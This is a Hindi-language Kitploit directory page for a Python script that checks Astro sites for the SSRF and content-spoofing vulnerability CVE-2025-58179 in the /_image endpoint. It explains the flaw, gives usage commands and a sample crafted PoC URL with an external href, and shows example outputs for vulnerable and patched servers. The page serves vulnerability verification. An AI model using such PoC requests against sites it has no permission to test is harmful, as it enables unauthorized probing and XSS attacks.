Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-58179-Check — पायथन स्क्रिप्ट जो Astro के `/_image` एंडपॉइंट में SSRF और कंटेंट स्पूफिंग कमजोरियों (CVE-2025-58179) की पुष्टि करती है, जिसमें स्वचालित PoC URL जनरेशन और HTTP रिस्पॉन्स सत्यापन शामिल है। | Kitploit
उपकरण/GitHubGitHub/shitodcy/cve-2025-58179-check
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshitodcy/cve-2025-58179-check

CVE-2025-58179-Check

पायथन स्क्रिप्ट जो Astro के `/_image` एंडपॉइंट में SSRF और कंटेंट स्पूफिंग कमजोरियों (CVE-2025-58179) की पुष्टि करती है, जिसमें स्वचालित PoC URL जनरेशन और HTTP रिस्पॉन्स सत्यापन शामिल है।

रिपॉजिटरी देखें
1210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-58179-Check

CVE-2025-58179-Check एस्ट्रो फ्रेमवर्क में /_image एंडपॉइंट पर SSRF (Server-Side Request Forgery) / Content Spoofing भेद्यता को सत्यापित करने के लिए एक साधारण Python स्क्रिप्ट है।

यह भेद्यता GHSA-qpr4-c339-7vq8 और CVE-2025-58179 के रूप में ट्रैक की जाती है।

भेद्यता की पृष्ठभूमि

यह भेद्यता उन Astro साइटों को प्रभावित करती है जो @astrojs/cloudflare एडेप्टर का उपयोग output: 'server' कॉन्फ़िगरेशन के साथ करती हैं। /_image एंडपॉइंट, जिसे छवियों को अनुकूलित करना चाहिए, href पैरामीटर को सही ढंग से मान्य नहीं करता है।

इससे हमलावर सर्वर को किसी भी अनधिकृत बाहरी डोमेन से सामग्री लाने और प्रस्तुत करने के लिए मजबूर कर सकता है। इसका प्रभाव SSRF हो सकता है, और यदि वह बाहरी सामग्री एक दुर्भावनापूर्ण फ़ाइल है (जैसे स्क्रिप्ट युक्त SVG), तो यह Cross-Site Scripting (XSS) का कारण बन सकती है।

यह स्क्रिप्ट यह जाँचने की प्रक्रिया को स्वचालित करती है कि कोई साइट इस समस्या के प्रति संवेदनशील है या नहीं।

विशेषताएं

  • सही प्रारूप के साथ स्वचालित रूप से PoC (Proof of Concept) URL बनाता है।
  • सर्वर प्रतिक्रिया की जांच करने के लिए वैकल्पिक HTTP सत्यापन करता है।
  • आसान विश्लेषण के लिए आउटपुट को रंग-कोडित करता है (Status Code, परिणाम)।
  • भेद्य प्रतिक्रियाओं का पता लगाता है (जैसे, Content-Type: image/* के साथ Status 200)।

आवश्यकताएँ

  • Python 3
  • requests लाइब्रेरी (केवल यदि सत्यापन कार्यक्षमता का उपयोग कर रहे हैं)

आप pip का उपयोग करके requests इंस्टॉल कर सकते हैं:

root@kitploit:~
pip install requests

उपयोग कैसे करें

  1. इस रिपॉज़िटरी को क्लोन करें या CVE-2025-58179-Check.py स्क्रिप्ट को कॉपी करें।
  2. सुनिश्चित करें कि स्क्रिप्ट निष्पादन योग्य है (यदि आवश्यक हो): chmod +x CVE-2025-58179-Check.py

1. केवल URL बनाना (बिना सत्यापन के)

यह विकल्प केवल एन्कोडेड PoC URL प्रिंट करेगा। यदि आप ब्राउज़र या अन्य टूल्स के साथ मैन्युअल रूप से परीक्षण करना चाहते हैं तो यह उपयोगी है।

कमांड:

root@kitploit:~
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL>

उदाहरण:

root@kitploit:~
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg)

आउटपुट:

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

2. URL बनाना और HTTP सत्यापन करना

यह विकल्प URL बनाएगा और सर्वर प्रतिक्रिया को सत्यापित करने के लिए सीधे HTTP GET अनुरोध भेजेगा।

कमांड:

root@kitploit:~
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL> -r

उदाहरण:

root@kitploit:~
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg) --request

सत्यापन आउटपुट के उदाहरण

उदाहरण परिणाम: भेद्य (Vulnerable)

यदि सर्वर स्थिति कोड 200 लौटाता है और सामग्री प्रकार छवि है, तो यह इंगित करता है कि सर्वर ने बाहरी सामग्री ली और प्रस्तुत की है।

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

[+] Sending HTTP request...
[+] Status Code: 200
[+] Content Type: image/jpeg
[+] Server returned image content - Potential vulnerability detected!

उदाहरण परिणाम: भेद्य नहीं (पैच किया गया)

जो सर्वर पैच किया गया है या सही ढंग से कॉन्फ़िगर किया गया है, वह अनधिकृत बाहरी डोमेन से अनुरोध को अस्वीकार कर देगा, आमतौर पर 4xx स्थिति लौटाकर।

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

[+] Sending HTTP request...
[+] Status Code: 400
[+] Content Type: text/plain;charset=UTF-8
[+] Client error - Resource might not be accessible

[!WARNING] चेतावनी

  • यह स्क्रिप्ट शैक्षिक उद्देश्यों और वैध सुरक्षा परीक्षण के लिए बनाई गई है।
  • उपयोगकर्ता अपने कार्यों के लिए पूरी तरह ज़िम्मेदार है। इस स्क्रिप्ट का उपयोग उन सिस्टमों पर न करें जिनके लिए आपके पास अनुमति नहीं है।
टूल डाउनलोड करें